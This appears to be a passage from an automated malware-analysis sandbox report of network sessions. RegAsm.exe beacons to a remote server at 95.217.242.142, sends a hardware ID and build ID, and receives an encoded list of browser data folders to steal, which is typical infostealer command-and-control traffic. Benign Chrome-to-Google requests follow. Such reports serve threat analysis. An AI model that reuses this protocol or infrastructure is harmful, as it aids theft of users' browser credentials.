                                                                                                                                                                                                                                                            2024-04-29 20:12:57 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                                            2024-04-29 20:12:57 UTC16384INData Raw: 20 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                                            Data Ascii: global_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
                                                                                                                                                                                                                                                            2024-04-29 20:12:57 UTC2897INData Raw: 20 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 75 6e 74 5f 6c 69 6e 6b 5f 70 72 65 76 69 65 77 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 20 6c 65 66 74 3b 22 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 6d 61 69 6e 74 61 69 6e 58 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 62 46 6f 63 75 73 52 69 6e 67 52 6f 6f 74 26 71 75 6f 74 3b 3a 74 72 75 65
                                                                                                                                                                                                                                                            Data Ascii: ><div class="profile_count_link_preview"><div style="clear: left;"></div></div></div></div><div data-panel="{&quot;maintainX&quot;:true,&quot;bFocusRingRoot&quot;:true


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192.168.2.44973195.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:12:59 UTC234OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:12:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2192.168.2.44973295.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:00 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGI
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 279
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:00 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 32 41 38 37 37 39 36 37 45 32 33 39 32 34 36 39 36 33 33 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                                                                                                                                                                            Data Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="hwid"A82A877967E23924696330-a33c7340-61ca-11ee-8c18-806e6f6e6963------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------
                                                                                                                                                                                                                                                            2024-04-29 20:13:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:01 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:01 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 3a1|1|1|0|24c4d4939bc918be2cb92a617d99a9f0|1|1|1|0|0|50000|00


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            3192.168.2.44973395.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:02 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:02 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------FCGIJDBAFCBAAKECGDGCCont
                                                                                                                                                                                                                                                            2024-04-29 20:13:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:02 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:02 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                                            Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            4192.168.2.449738142.250.191.1644437872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:02 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-04-29 20:13:02 UTC1703INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:02 GMT
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-sgYTWz9VKczE2bPumLouXQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-04-29 20:13:02 UTC1703INData Raw: 31 62 32 33 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 31 36 20 70 72 6f 20 6d 61 78 22 2c 22 72 61 72 65 20 6f 6e 65 20 64 6f 6c 6c 61 72 20 62 69 6c 6c 73 22 2c 22 6e 79 63 20 63 68 65 65 73 65 20 62 61 6c 6c 73 22 2c 22 63 68 69 63 61 67 6f 20 62 65 61 72 73 22 2c 22 6d 61 6e 6f 72 20 6c 6f 72 64 73 20 67 61 6d 65 22 2c 22 6d 69 66 66 6c 69 6e 20 73 74 72 65 65 74 20 62 6c 6f 63 6b 20 70 61 72 74 79 20 63 61 72 22 2c 22 64 65 61 64 70 6f 6f 6c 20 77 6f 6c 76 65 72 69 6e 65 20 74 72 61 69 6c 65 72 22 2c 22 6e 65 78 74 20 67 65 6e 20 66 61 6c 6c 6f 75 74 20 75 70 64 61 74 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61
                                                                                                                                                                                                                                                            Data Ascii: 1b23)]}'["",["apple iphone 16 pro max","rare one dollar bills","nyc cheese balls","chicago bears","manor lords game","mifflin street block party car","deadpool wolverine trailer","next gen fallout update"],["","","","","","","",""],[],{"google:clientda
                                                                                                                                                                                                                                                            2024-04-29 20:13:02 UTC1703INData Raw: 32 31 46 53 32 64 46 53 57 74 4a 51 32 35 5a 4d 54 4a 75 51 56 42 74 55 33 70 34 64 47 56 48 5a 6e 52 33 54 58 42 74 54 6d 6c 50 63 47 6c 46 4b 30 51 33 57 6c 45 35 63 30 6c 51 61 55 74 75 4e 56 64 4b 62 6d 68 6a 64 44 59 72 57 6e 70 52 63 47 4d 31 5a 30 4a 75 62 32 68 4a 55 7a 59 30 51 31 4a 33 55 69 74 57 64 7a 64 4a 59 6b 46 7a 63 46 70 43 57 6c 46 48 62 57 68 46 55 7a 55 31 52 6e 68 72 5a 55 56 59 4f 48 46 76 63 30 4a 46 53 6d 35 56 53 57 34 33 4e 57 56 47 64 30 70 77 4e 30 31 4e 56 33 52 76 65 46 45 32 4d 53 39 4e 65 56 59 31 62 6d 5a 6f 54 47 70 61 56 45 70 4a 54 31 56 52 4d 57 46 4d 52 45 6f 7a 55 48 52 70 56 69 39 49 51 56 4d 32 52 45 46 30 53 6b 6c 70 5a 47 39 54 53 55 64 57 53 54 56 78 4d 30 67 77 61 6d 4a 44 61 45 64 54 61 44 64 4b 57 54 68 78
                                                                                                                                                                                                                                                            Data Ascii: 21FS2dFSWtJQ25ZMTJuQVBtU3p4dGVHZnR3TXBtTmlPcGlFK0Q3WlE5c0lQaUtuNVdKbmhjdDYrWnpRcGM1Z0Jub2hJUzY0Q1J3UitWdzdJYkFzcFpCWlFHbWhFUzU1RnhrZUVYOHFvc0JFSm5VSW43NWVGd0pwN01NV3RveFE2MS9NeVY1bmZoTGpaVEpJT1VRMWFMREozUHRpVi9IQVM2REF0SklpZG9TSUdWSTVxM0gwamJDaEdTaDdKWThx
                                                                                                                                                                                                                                                            2024-04-29 20:13:02 UTC1703INData Raw: 4e 54 46 30 5a 48 59 76 64 6d 31 72 52 45 35 35 55 56 64 4c 4d 31 68 78 4d 44 6b 7a 4c 7a 4a 36 4c 30 5a 6d 63 31 68 51 4d 47 6c 4c 51 69 38 77 4e 32 5a 75 63 30 46 42 51 55 46 42 55 31 56 57 54 31 4a 4c 4e 55 4e 5a 53 55 6b 39 4f 67 31 44 61 47 6c 6a 59 57 64 76 49 45 4a 6c 59 58 4a 7a 53 67 63 6a 59 54 4d 79 5a 54 41 77 55 6a 5a 6e 63 31 39 7a 63 33 41 39 5a 55 70 36 61 6a 52 30 52 46 41 78 56 47 4e 33 63 6b 52 52 64 55 30 79 52 44 41 30 61 7a 4e 50 65 55 56 34 54 31 52 4e 4f 56 68 54 52 58 42 4f 54 45 4e 76 52 30 46 47 4d 6d 78 43 4c 56 46 77 42 77 5c 75 30 30 33 64 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 67 6f 6f 67 6c 65 3a 65 6e 74 69 74 79 69 6e 66 6f 22 3a 22 43 67 30 76 5a 79 38 78 4d 57 70 32 62 6a 5a 36 65 56 38 32 45
                                                                                                                                                                                                                                                            Data Ascii: NTF0ZHYvdm1rRE55UVdLM1hxMDkzLzJ6L0Zmc1hQMGlLQi8wN2Zuc0FBQUFBU1VWT1JLNUNZSUk9Og1DaGljYWdvIEJlYXJzSgcjYTMyZTAwUjZnc19zc3A9ZUp6ajR0RFAxVGN3ckRRdU0yRDA0azNPeUV4T1RNOVhTRXBOTENvR0FGMmxCLVFwBw\u003d\u003d","zl":10002},{"google:entityinfo":"Cg0vZy8xMWp2bjZ6eV82E
                                                                                                                                                                                                                                                            2024-04-29 20:13:03 UTC1703INData Raw: 57 5a 4b 64 31 42 75 55 33 52 56 5a 58 4d 30 52 54 4e 69 53 6e 46 6f 61 58 5a 4b 52 7a 68 45 56 6b 51 32 63 6e 5a 56 4f 54 64 7a 4d 47 78 49 52 6c 55 35 54 30 39 61 62 45 78 7a 65 46 6c 6e 63 55 64 43 55 45 67 33 59 58 4d 35 63 57 4e 61 54 55 70 6d 53 6c 5a 44 64 6c 4d 78 61 32 4e 71 4f 56 64 54 62 55 56 4c 65 55 74 47 61 31 52 78 59 6a 42 43 65 55 4e 54 51 56 59 72 61 30 67 79 65 6e 67 76 52 32 63 77 63 45 70 48 63 55 35 36 52 6b 5a 44 4f 47 6c 52 5a 48 4d 76 62 30 31 6b 4c 33 64 44 4b 33 46 34 61 6c 5a 34 55 30 4a 51 64 7a 68 78 64 45 31 6d 4e 6d 46 4c 61 45 63 34 53 45 46 48 51 6a 56 43 65 48 67 72 64 6e 70 79 65 55 39 77 63 55 70 77 4d 6c 4e 57 4d 31 64 5a 54 57 52 35 62 45 31 72 52 55 46 42 4e 55 49 72 4d 6e 4e 69 63 55 38 34 52 32 56 74 5a 58 5a 71
                                                                                                                                                                                                                                                            Data Ascii: WZKd1BuU3RVZXM0RTNiSnFoaXZKRzhEVkQ2cnZVOTdzMGxIRlU5T09abExzeFlncUdCUEg3YXM5cWNaTUpmSlZDdlMxa2NqOVdTbUVLeUtGa1RxYjBCeUNTQVYra0gyengvR2cwcEpHcU56RkZDOGlRZHMvb01kL3dDK3F4alZ4U0JQdzhxdE1mNmFLaEc4SEFHQjVCeHgrdnpyeU9wcUpwMlNWM1dZTWR5bE1rRUFBNUIrMnNicU84R2VtZXZq
                                                                                                                                                                                                                                                            2024-04-29 20:13:03 UTC143INData Raw: 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","ENTITY","ENTITY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                            2024-04-29 20:13:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            5192.168.2.449739142.250.191.1644437872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:03 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            6192.168.2.449740142.250.191.1644437872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:03 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-04-29 20:13:03 UTC1843INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGM_-v7EGIjCEhPLSBTrZPAY39cVYHNd6_L3Rxj8WO6tEohgLxJlwyjn4Ct7LVz-jrTx9H46727MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                                                                                                                            x-hallmonitor-challenge: CgwIz_6_sQYQ8ZW9qgISBFG1Plo
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
